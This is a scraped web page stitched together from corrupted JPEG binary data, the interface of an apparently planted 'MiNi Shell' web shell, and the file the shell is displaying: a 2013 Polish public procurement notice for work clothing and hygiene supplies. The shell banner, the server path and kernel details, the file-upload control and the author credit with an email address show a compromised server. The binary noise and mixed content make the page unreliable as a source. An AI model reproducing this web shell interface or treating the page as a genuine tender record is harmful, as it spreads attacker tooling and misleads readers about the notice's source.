JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130128/37212-N-2013.html

<p class="kh_header"><b>Krasnystaw: Dostawa odzieży roboczej, ochronnej, obuwia, ręczników  i rękawic roboczych oraz środków czystości bhp dla
PGK Sp. z o.o. w Krasnymstawie.</b><br>
<b>Numer ogłoszenia: 37212 - 2013; data zamieszczenia: 28.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Gospodarki Komunalnej Spółka z o.o. , ul. Piekarskiego 3, 22-300 Krasnystaw, woj. lubelskie, tel. 82 5762537, faks 82 5766830.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pgkkrasnystaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Sp. z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odzieży roboczej, ochronnej, obuwia, ręczników  i rękawic roboczych oraz środków czystości bhp dla
PGK Sp. z o.o. w Krasnymstawie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie podzielone jest na części.
Zamawiający dopuszcza składanie ofert częściowych.
Wykonawca może złożyć ofertę na jedną lub więcej części zamówienia. Ofertę należy złożyć oddzielnie na każdą część. Każda część będzie oceniana osobno.
Część I:
1. Przedmiotem zamówienia jest dostawa odzieży ochronnej, roboczej, obuwia, ręczników i rękawic roboczych dla pracowników PGK Sp. z o.o. w Krasnymstawie  według rodzajowego i ilościowego zestawienia. Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 2 do SIWZ (formularz asortymentowo - cenowy) dla Części I.
a) Zamawiający wymaga, aby Wykonawca zapewnił dostarczonym towarom  gwarancję na okres nie krótszy niż 12 miesięcy.
     Gwarancja minimum 12 miesięcy, obejmuje wszystkie wykryte podczas eksploatacji wady oraz uszkodzenia powstałe w czasie poprawnego, zgodnego z przeznaczeniem użytkowania przy czym Wykonawca może zaproponować czas gwarancji dłuższy. W zakresie części I zamówienia Wykonawca zobowiązuje się, aby dostarczone produkty były należytej jakości
b)  Oferowane przedmiot zamówienia winien spełniać normy wskazane w załączniku nr 2 do SIWZ dla Części I.
c) Podane  zapotrzebowanie  jest  wielkością  orientacyjną i  może ulec     zmniejszeniu lub zwiększeniu w czasie obowiązywania umowy.
W przypadku zakupu  w ilości mniejszej niż określona w Załączniku nr 2 do SIWZ  dla Części I ( szacunkowe ilości), Wykonawcy nie przysługują żadne roszczenia.
d) W przypadku, gdy Zamawiający nie określi konkretnych rozmiarów i kolorystki odzieży, obuwia i rękawic Zamawiający wymaga, aby proponowana odzież, obuwie i rękawice były dostępne  w pełnej rozmiarówce i kolorystyce dostępnej u Producenta.
e)  Wykonawca oświadcza, że jest uprawniony oraz posiada niezbędne kwalifikacje do pełnej realizacji przedmiotu umowy. Dostarczona odzież robocza musi posiadać wymagane atesty i certyfikaty zgodne z obowiązującym stanem prawnym, które Wykonawca przedstawi na każde jego żądanie.
f)  Wykonawca będzie realizował dostawy sukcesywnie, wg potrzeb Zamawiającego   zgłaszanych faksem lub drogą elektroniczną na adres e-mailowy.
g)  Wielkość, każdej partii dostarczonych materiałów będzie wynikać z jednostronnej dyspozycji osoby odpowiedzialnej ze strony Zamawiającego za realizację przedmiotu umowy do miejsc określonych  w zamówieniu.
h)  Wykonawca dostarczy zamówiony asortyment w terminie 10 dni roboczych licząc od dnia złożenia zamówienia, w godz. od 8-15, od poniedziałku do piątku.

i)  W przypadku nie dotrzymania terminu dostawy przez Wykonawcę, Zamawiający zakupi niedostarczoną partię przedmiotu umowy u innego dostawcy, a ewentualną różnicą kosztów obciąży Wykonawcę chyba, że wydłużenie terminu nastąpi z uzasadnionych powodów, o których Zamawiający zostanie poinformowany. 
j)  Wykonawca dostarczy artykuły własnym transportem, i zapewni rozładunek w miejscu wskazanym przez Zamawiającego.
k) Zamawiający wymaga, aby dostarczone artykuły posiadały nienaruszone opakowania fabryczne oraz nienaruszone cechy pierwotnego opakowania, opatrzone były wszystkimi metkami z nazwą producenta, składem tkaniny, temperaturą prania i rozmiarem.
Logo -załącznik nr 8 do SIWZ powinno być umieszczone na tylnej części bluz lub kurtek (na plecach)
l) Dostarczona partia towaru nie będzie odebrana przez Zamawiającego  w przypadku stwierdzenia niezgodności z przedmiotem zamówienia, umową lub fakturą.
ł)   W razie stwierdzenia wad w odebranych artykułach Zamawiający złoży stosowną reklamację (pisemną) według § 9 umowy do SIWZ.
Kod CPV:	    18 800000-7 - Obuwie
                   18 10 0000-0 - Obuwie inne niż sportowe oraz ochronne
                   18 141000-9 - Rękawice robocze
                   39 514100-9 - Ręczniki
                    35 113400-3 - Odzież ochronna i zabezpieczająca
Część II:
Przedmiotem zamówienia jest dostawa Środków czystości BHP. Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 2 do SIWZ (formularz asortymentowo - cenowy) dla Części II.
a) Oferowane przedmiot zamówienia winien posiadać atest PZH
b)  posiadać karty charakterystyki do środków chemicznych, które Wykonawca ma obowiązek dostarczyć wraz z pierwszą dostawą do siedziby Zamawiającego w formie kserokopii potwierdzonej za zgodność z oryginałem przez Wykonawcę lub upełnomocnionego przedstawiciela Wykonawcy. 
     Karty charakterystyki muszą być sporządzone w języku polskim.
c) Podane  zapotrzebowanie  jest  wielkością  orientacyjną i  może ulec     zmniejszeniu lub zwiększeniu w czasie obowiązywania umowy.
     W przypadku zakupu  w ilości mniejszej niż określona w Załączniku nr 2  do SIWZ dla Części  II ( szacunkowe ilości), Wykonawcy nie przysługują żadne roszczenia.
d)  Wykonawca oświadcza, że jest uprawniony oraz posiada niezbędne kwalifikacje do pełnej realizacji przedmiotu umowy. 
e)  Wykonawca będzie realizował dostawy sukcesywnie, wg potrzeb Zamawiającego   zgłaszanych faksem lub drogą elektroniczną na adres e-mailowy.
f)  Wielkość, każdej partii dostarczonych materiałów będzie wynikać z jednostronnej dyspozycji osoby odpowiedzialnej ze strony Zamawiającego za realizację przedmiotu umowy do miejsc określonych  w zamówieniu.
g)  Wykonawca dostarczy zamówiony asortyment w terminie 10 dni roboczych licząc od dnia złożenia zamówienia, w godz. od 8-15, od poniedziałku do piątku.
h)  Wykonawca dostarczy artykuły własnym transportem, i zapewni rozładunek w miejscu wskazanym przez Zamawiającego.
i) Zamawiający wymaga, aby dostarczone artykuły posiadały nienaruszone opakowania fabryczne oraz nienaruszone cechy pierwotnego opakowania,
 j) Dostarczona partia towaru nie będzie odebrana przez Zamawiającego w przypadku stwierdzenia niezgodności z przedmiotem zamówienia, umową lub fakturą.
Kod CPV:  39813000 -4 -  Pasty i proszki czyszczące
                   39832000 -3 -  Produkty do zmywania naczyń
                   33711900 -6 -  Mydło
                   39811100 -1 -  Odświeżacze powietrza
                   39830000 - 9 - środki czyszczące
                   39833000 - 0  - produkty do kurzu
                   39831600 - 2 - środki do czyszczenia toalet
                      33763000 - 6 -  Ręczniki papierowe do rąk
                       33761000 - 2 -  Papier toaletowy
                       25161200 - 9  - Roztwory myjące

k)    Dostarczony przedmiot zamówienia będzie pełnowartościowy do użytku przez okres  co najmniej 12 miesięcy od daty otrzymania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 18.80.00.00-7, 18.10.00.00-0, 18.14.10.00-9, 39.51.41.00-9, 35.11.34.00-3, 39.81.30.00-4, 39.83.20.00-3, 33.71.19.00-6, 39.81.11.00-1, 39.83.00.00-9, 39.83.30.00-0, 39.83.16.00-2, 33.76.30.00-6, 33.76.10.00-2, 25.16.12.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże się wykonaniem    w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy                    -    w tym okresie, minimum 2 dostawy zamówień porównywalnych i  odpowiadających swoim charakterem oraz wielkością niniejszemu przedmiotowi zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te dostawy zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Część I: 
        Do wszystkich elementów niniejszego zamówienia konieczne dołączenie deklaracji zgodności WE spełniającej wymagania określone w § 36 rozporządzenia Ministra Gospodarki z dnia 21 grudnia 2005 r. w sprawie zasadniczych wymagań dla środków ochrony indywidualnej (Dz. U. Nr 259, poz. 2173).
Na każdy wyrób Wykonawca powinien posiadać deklarację zgodności PN.
Część II: 
Asortyment oferowany przez Wykonawcę powinien posiadać atest PZH
	Powinien być przydatny do użytku przez okres co najmniej 12 miesięcy od daty otrzymania.
          Posiadać karty charakterystyki do środków chemicznych ((dotycz produktów, które posiadają karty) i opisy oferowanych produktów (opis katalogowy produktu), które Wykonawca  ma obowiązek dostarczyć wraz z pierwszą dostawą do siedziby Zamawiającego  w formie kserokopii potwierdzonej za zgodność z oryginałem przez Wykonawcę lub upełnomocnionego przedstawiciela Wykonawcy.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wzór umowy stanowi załącznik nr 6 do niniejszej SIWZ.
2.		Zamawiający dopuszcza możliwość dokonania zmiany postanowień zawartej umowy                      w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy                                  w następujących przypadkach:
	a)	zmiany przepisów mających wpływ na wynagrodzenie Wykonawcy - skutkujące uprawnieniem Stron do zmiany wysokości tego wynagrodzenia,
	b)	zmiany obowiązującej stawki podatku od towarów i usług (VAT),
	c)	zmiany spowodowane siłą wyższą uniemożliwiającą wykonanie przedmiotu umowy,
	d)	inne przyczyny zewnętrzne niezależne od Zamawiającego i Wykonawcy skutkujące niemożliwością wykonania przedmiotu zamówienia.
3.		W przypadku zmiany przepisów dotyczących stawek podatku od towarów i usług (VAT) wynagrodzenie Wykonawcy może ulec zmianie i będzie uzależnione od wysokości nowej stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pgkkrasnystaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Gospodarki Komunalnej Spółka z o.o., 22-300 Krasnystaw ul. Piekarskiego 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.02.2013 godzina 11:00, miejsce: Przedsiębiorstwo Gospodarki Komunalnej Spółka z o.o. - sekretariat Spółki pokój Nr 6, 22-300 Krasnystaw ul. Piekarskiego 3..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com